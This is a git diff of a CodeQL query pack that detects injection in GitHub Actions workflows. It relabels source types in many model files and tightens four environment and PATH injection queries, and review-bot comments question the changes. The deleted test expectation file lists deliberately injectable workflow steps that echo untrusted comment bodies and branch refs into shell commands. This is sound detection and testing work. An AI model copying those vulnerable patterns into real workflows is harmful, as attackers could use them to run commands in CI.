ecfce617df4..71d83774231 100644 --- a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml +++ b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "PR body", "manual"] - - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_TITLE", "PR title", "manual"] + - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "text", "manual"] + - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_TITLE", "title", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml index acb5d462d15..062203945c5 100644 --- a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml @@ -8,4 +8,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["googlecloudplatform/magic-modules", "*", "output.changed-files", "PR changed files", "manual"] + - ["googlecloudplatform/magic-modules", "*", "output.changed-files", "filename", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml b/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml index 0d96077345f..9cc02d3b38c 100644 --- a/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["puppeteer/puppeteer/.github/workflows/changed-packages.yml", "*", "output.changes", "Changed files", "manual"] + - ["puppeteer/puppeteer/.github/workflows/changed-packages.yml", "*", "output.changes", "filename", "manual"] diff --git a/ql/lib/ext/jitterbit_get-changed-files.model.yml b/ql/lib/ext/jitterbit_get-changed-files.model.yml index 38253b68934..e74f953a1a1 100644 --- a/ql/lib/ext/jitterbit_get-changed-files.model.yml +++ b/ql/lib/ext/jitterbit_get-changed-files.model.yml 
@@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["jitterbit/get-changed-files", "*", "output.all", "PR changed files", "manual"] - - ["jitterbit/get-changed-files", "*", "output.added", "PR changed files", "manual"] - - ["jitterbit/get-changed-files", "*", "output.modified", "PR changed files", "manual"] - - ["jitterbit/get-changed-files", "*", "output.removed", "PR changed files", "manual"] - - ["jitterbit/get-changed-files", "*", "output.renamed", "PR changed files", "manual"] - - ["jitterbit/get-changed-files", "*", "output.added_modified", "PR changed files", "manual"] - - ["jitterbit/get-changed-files", "*", "output.deleted", "PR changed files", "manual"] + - ["jitterbit/get-changed-files", "*", "output.all", "filename", "manual"] + - ["jitterbit/get-changed-files", "*", "output.added", "filename", "manual"] + - ["jitterbit/get-changed-files", "*", "output.modified", "filename", "manual"] + - ["jitterbit/get-changed-files", "*", "output.removed", "filename", "manual"] + - ["jitterbit/get-changed-files", "*", "output.renamed", "filename", "manual"] + - ["jitterbit/get-changed-files", "*", "output.added_modified", "filename", "manual"] + - ["jitterbit/get-changed-files", "*", "output.deleted", "filename", "manual"] diff --git a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml index bbfc0bed1df..9a58d9a764f 100644 --- a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml +++ b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "Comment body", "manual"] - - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "Comment body", "manual"] + - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "text", "manual"] + - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "text", "manual"] diff --git a/ql/lib/ext/marocchino_on_artifact.model.yml b/ql/lib/ext/marocchino_on_artifact.model.yml index 7a556a0f0ec..c8646cffe8e 100644 --- a/ql/lib/ext/marocchino_on_artifact.model.yml +++ b/ql/lib/ext/marocchino_on_artifact.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["marocchino/on_artifact", "*", "output.*", "Downloaded artifact", "manual"] + - ["marocchino/on_artifact", "*", "output.*", "artifact", "manual"] diff --git a/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml b/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml index 9b0ec011fd6..a85a4b466e2 100644 --- a/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml +++ b/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["redhat-plumbers-in-action/download-artifact", "*", "output.*", "Downloaded artifact", "manual"] + - ["redhat-plumbers-in-action/download-artifact", "*", "output.*", "artifact", "manual"] diff --git a/ql/lib/ext/tj-actions_branch-names.model.yml b/ql/lib/ext/tj-actions_branch-names.model.yml index 753303b0cb3..d98eda4e69f 100644 --- a/ql/lib/ext/tj-actions_branch-names.model.yml +++ b/ql/lib/ext/tj-actions_branch-names.model.yml 
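Review bot: Both rows of `khan_pull-request-comment-trigger.model.yml` are the same tuple, `["khan/pull-request-comment-trigger", "*", "output.comment_body", "text", "manual"]`, before and after this change. The second row adds nothing to the source model. It should either be removed or, if it was meant to cover a different output of the action, replaced with that output's name.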
@@ -4,7 +4,7 @@ extensions: extensible: sourceModel data: # https://github.com/tj-actions/branch-names - - ["tj-actions/branch-names", "*", "output.current_branch", "PR current branch", "manual"] - - ["tj-actions/branch-names", "*", "output.head_ref_branch", "PR head branch", "manual"] - - ["tj-actions/branch-names", "*", "output.ref_branch", "Branch tirggering workflow run", "manual"] + - ["tj-actions/branch-names", "*", "output.current_branch", "branch", "manual"] + - ["tj-actions/branch-names", "*", "output.head_ref_branch", "branch", "manual"] + - ["tj-actions/branch-names", "*", "output.ref_branch", "branch", "manual"] diff --git a/ql/lib/ext/tj-actions_changed-files.model.yml b/ql/lib/ext/tj-actions_changed-files.model.yml index fb15abce061..60fa0149573 100644 --- a/ql/lib/ext/tj-actions_changed-files.model.yml +++ b/ql/lib/ext/tj-actions_changed-files.model.yml 
@@ -3,20 +3,20 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["tj-actions/changed-files", "*", "output.added_files", "PR changed files", "manual"] - - ["tj-actions/changed-files", "*", "output.copied_files", "PR changed files", "manual"] - - ["tj-actions/changed-files", "*", "output.deleted_files", "PR changed files", "manual"] - - ["tj-actions/changed-files", "*", "output.modified_files", "PR changed files", "manual"] - - ["tj-actions/changed-files", "*", "output.renamed_files", "PR changed files", "manual"] - - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "PR changed files", "manual"] - - ["tj-actions/changed-files", "*", "output.type_changed_files", "PR changed files", "manual"] - - ["tj-actions/changed-files", "*", "output.unmerged_files", "PR changed files", "manual"] - - ["tj-actions/changed-files", "*", "output.unknown_files", "PR changed files", "manual"] - - ["tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "PR changed files", "manual"] - - ["tj-actions/changed-files", "*", "output.all_changed_files", "PR changed files", "manual"] - - ["tj-actions/changed-files", "*", "output.other_changed_files", "PR changed files", "manual"] - - ["tj-actions/changed-files", "*", "output.all_modified_files", "PR changed files", "manual"] - - ["tj-actions/changed-files", "*", "output.other_modified_files", "PR changed files", "manual"] - - ["tj-actions/changed-files", "*", "output.other_deleted_files", "PR changed files", "manual"] - - ["tj-actions/changed-files", "*", "output.modified_keys", "PR changed files", "manual"] - - ["tj-actions/changed-files", "*", "output.changed_keys", "PR changed files", "manual"] + - ["tj-actions/changed-files", "*", "output.added_files", "filename", "manual"] + - ["tj-actions/changed-files", "*", "output.copied_files", "filename", "manual"] + - ["tj-actions/changed-files", "*", "output.deleted_files", "filename", "manual"] + - 
["tj-actions/changed-files", "*", "output.modified_files", "filename", "manual"] + - ["tj-actions/changed-files", "*", "output.renamed_files", "filename", "manual"] + - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "filename", "manual"] + - ["tj-actions/changed-files", "*", "output.type_changed_files", "filename", "manual"] + - ["tj-actions/changed-files", "*", "output.unmerged_files", "filename", "manual"] + - ["tj-actions/changed-files", "*", "output.unknown_files", "filename", "manual"] + - ["tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "filename", "manual"] + - ["tj-actions/changed-files", "*", "output.all_changed_files", "filename", "manual"] + - ["tj-actions/changed-files", "*", "output.other_changed_files", "filename", "manual"] + - ["tj-actions/changed-files", "*", "output.all_modified_files", "filename", "manual"] + - ["tj-actions/changed-files", "*", "output.other_modified_files", "filename", "manual"] + - ["tj-actions/changed-files", "*", "output.other_deleted_files", "filename", "manual"] + - ["tj-actions/changed-files", "*", "output.modified_keys", "filename", "manual"] + - ["tj-actions/changed-files", "*", "output.changed_keys", "filename", "manual"] diff --git a/ql/lib/ext/tj-actions_verify-changed-files.model.yml b/ql/lib/ext/tj-actions_verify-changed-files.model.yml index 8e4938368b8..9dccf6d5e6c 100644 --- a/ql/lib/ext/tj-actions_verify-changed-files.model.yml +++ b/ql/lib/ext/tj-actions_verify-changed-files.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["tj-actions/verify-changed-files", "*", "output.changed-files", "PR changed files", "manual"] + - ["tj-actions/verify-changed-files", "*", "output.changed-files", "filename", "manual"] diff --git a/ql/lib/ext/trilom_file-changes-action.model.yml b/ql/lib/ext/trilom_file-changes-action.model.yml index 61141e5f73b..b8fb2514253 100644 --- a/ql/lib/ext/trilom_file-changes-action.model.yml 
+++ b/ql/lib/ext/trilom_file-changes-action.model.yml
@@ -3,7 +3,7 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["trilom/file-changes-action", "*", "output.files", "PR changed files", "manual"]
- - ["trilom/file-changes-action", "*", "output.files_added", "PR changed files", "manual"]
- - ["trilom/file-changes-action", "*", "output.files_modified", "PR changed files", "manual"]
- - ["trilom/file-changes-action", "*", "output.files_removed", "PR changed files", "manual"]
+ - ["trilom/file-changes-action", "*", "output.files", "filename", "manual"]
+ - ["trilom/file-changes-action", "*", "output.files_added", "filename", "manual"]
+ - ["trilom/file-changes-action", "*", "output.files_modified", "filename", "manual"]
+ - ["trilom/file-changes-action", "*", "output.files_removed", "filename", "manual"]
diff --git a/ql/lib/ext/tzkhan_pr-update-action.model.yml b/ql/lib/ext/tzkhan_pr-update-action.model.yml
index c80590e4931..499161aafcb 100644
--- a/ql/lib/ext/tzkhan_pr-update-action.model.yml
+++ b/ql/lib/ext/tzkhan_pr-update-action.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["tzkhan/pr-update-action", "*", "output.headMatch", "", "manual"]
+ - ["tzkhan/pr-update-action", "*", "output.headMatch", "branch", "manual"]
diff --git a/ql/lib/ext/xt0rted_slash-command-action.model.yml b/ql/lib/ext/xt0rted_slash-command-action.model.yml
index 2a4378d1712..173ecfc4222 100644
--- a/ql/lib/ext/xt0rted_slash-command-action.model.yml
+++ b/ql/lib/ext/xt0rted_slash-command-action.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["xt0rted/slash-command-action", "*", "output.command-arguments", "", "manual"]
- - ["xt0rted/slash-command-action", "*", "output.command-arguments", "", "manual"]
+ - ["xt0rted/slash-command-action", "*", "output.command-arguments", "text", "manual"]
+ - ["xt0rted/slash-command-action", "*", "output.command-arguments", "text", "manual"]
diff --git a/ql/src/Security/CWE-077/EnvPathInjection.ql b/ql/src/Security/CWE-077/EnvPathInjection.ql
index 720b7aed8cc..50ad0149703 100644
--- a/ql/src/Security/CWE-077/EnvPathInjection.ql
+++ b/ql/src/Security/CWE-077/EnvPathInjection.ql
@@ -25,6 +25,12 @@ where
 exists(Job j |
 j = sink.getNode().asExpr().getEnclosingJob() and
 not j.isPrivileged()
+ ) and
+ (
+ not source.getNode().(RemoteFlowSource).getSourceType() = "artifact"
+ or
+ source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and
+ sink.getNode() instanceof EnvPathInjectionFromFileReadSink
 )
 )
 select sink.getNode(), source, sink,
diff --git a/ql/src/Security/CWE-077/EnvVarInjection.ql b/ql/src/Security/CWE-077/EnvVarInjection.ql
index af3f2998cc9..109d77d7425 100644
--- a/ql/src/Security/CWE-077/EnvVarInjection.ql
+++ b/ql/src/Security/CWE-077/EnvVarInjection.ql
@@ -25,7 +25,14 @@ where
 exists(Job j |
 j = sink.getNode().asExpr().getEnclosingJob() and
 not j.isPrivileged()
- )
+ ) and
+ (
+ not source.getNode().(RemoteFlowSource).getSourceType() = "artifact"
+ or
+ source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and
+ sink.getNode() instanceof EnvVarInjectionFromFileReadSink
+ ) and
+ not source.getNode().(RemoteFlowSource).getSourceType() = "branch"
 )
 select sink.getNode(), source, sink,
 "Potential environment variable injection in $@, which may be controlled by an external user.",
diff --git a/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql b/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql
index 3e7c74ab895..593fd620c9f 100644
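Review bot: The artifact condition added to `EnvPathInjection.ql` compares `getSourceType()` with the bare string `"artifact"`, and the same six lines are repeated in `EnvVarInjection.ql`, `PrivilegedEnvPathInjection.ql` and `PrivilegedEnvVarInjection.ql`. The value comes from the fourth column of the `*.model.yml` rows relabelled in this commit, so a row that keeps an old label or is misspelled satisfies `not … = "artifact"` and is reported at every sink instead of only at file-read sinks, without any error. I would move the test into one shared predicate next to the sink classes and document the accepted source-type strings there, with a line such as `// artifact sources are only reported when the sink reads the value from a file`. The `where` clause begins above this hunk, so the full condition is not visible here.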
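Review bot: The last added conjunct in `EnvVarInjection.ql`, `not source.getNode().(RemoteFlowSource).getSourceType() = "branch"`, removes every branch-labelled source from the results with no comment saying why, and `PrivilegedEnvVarInjection.ql` gains the same line. Presumably the reasoning is that a git ref name cannot contain the newline needed to add a second variable to the environment file, but that only holds for values that really are ref names; this commit also relabels `tzkhan/pr-update-action` `output.headMatch` from an empty type to `branch`, which puts it under the exclusion. Please state the assumption above the conjunct, for example `// branch names cannot contain newlines, so they cannot add a variable to the env file`, and confirm that each `branch` model row satisfies it. The two PATH queries do not exclude `branch`; if that difference is intended it deserves a comment as well.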
--- a/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql
+++ b/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql
@@ -22,6 +22,12 @@ where
 exists(Job j |
 j = sink.getNode().asExpr().getEnclosingJob() and
 j.isPrivileged()
+ ) and
+ (
+ not source.getNode().(RemoteFlowSource).getSourceType() = "artifact"
+ or
+ source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and
+ sink.getNode() instanceof EnvPathInjectionFromFileReadSink
 )
 select sink.getNode(), source, sink,
 "Potential privileged PATH environment variable injection in $@, which may be controlled by an external user.",
diff --git a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql
index aac7568e654..bf637af1195 100644
--- a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql
+++ b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql
@@ -22,7 +22,14 @@ where
 exists(Job j |
 j = sink.getNode().asExpr().getEnclosingJob() and
 j.isPrivileged()
- )
+ ) and
+ (
+ not source.getNode().(RemoteFlowSource).getSourceType() = "artifact"
+ or
+ source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and
+ sink.getNode() instanceof EnvVarInjectionFromFileReadSink
+ ) and
+ not source.getNode().(RemoteFlowSource).getSourceType() = "branch"
 select sink.getNode(), source, sink,
 "Potential privileged environment variable injection in $@, which may be controlled by an external user.",
 sink, sink.getNode().toString()
diff --git a/ql/test/library-tests/test.actual b/ql/test/library-tests/test.actual
deleted file mode 100644
index ee68d409634..00000000000
--- a/ql/test/library-tests/test.actual
+++ /dev/null
@@ -1,598 +0,0 @@ -files -| .github/workflows/expression_nodes.yml:0:0:0:0 | .github/workflows/expression_nodes.yml | -| .github/workflows/multiline.yml:0:0:0:0 | .github/workflows/multiline.yml | -| .github/workflows/test.yml:0:0:0:0 | .github/workflows/test.yml | -workflows -| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/test.yml:1:1:40:53 | on: push | -reusableWorkflows -compositeActions -jobs -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | -localJobs -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | -extJobs -steps -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| 
.github/workflows/test.yml:39:9:40:53 | Run Step: sink | -runSteps -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ 
github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | -runExprs -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:20:27:64 | 
steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -uses -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -stepUses -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -usesArgs -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | source | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -runStepChildren -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 
echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:13:39:16 | sink | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | -parentNodes -| .github/workflows/expression_nodes.yml:1:5:1:17 | 
issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| 
.github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:10:14:12:53 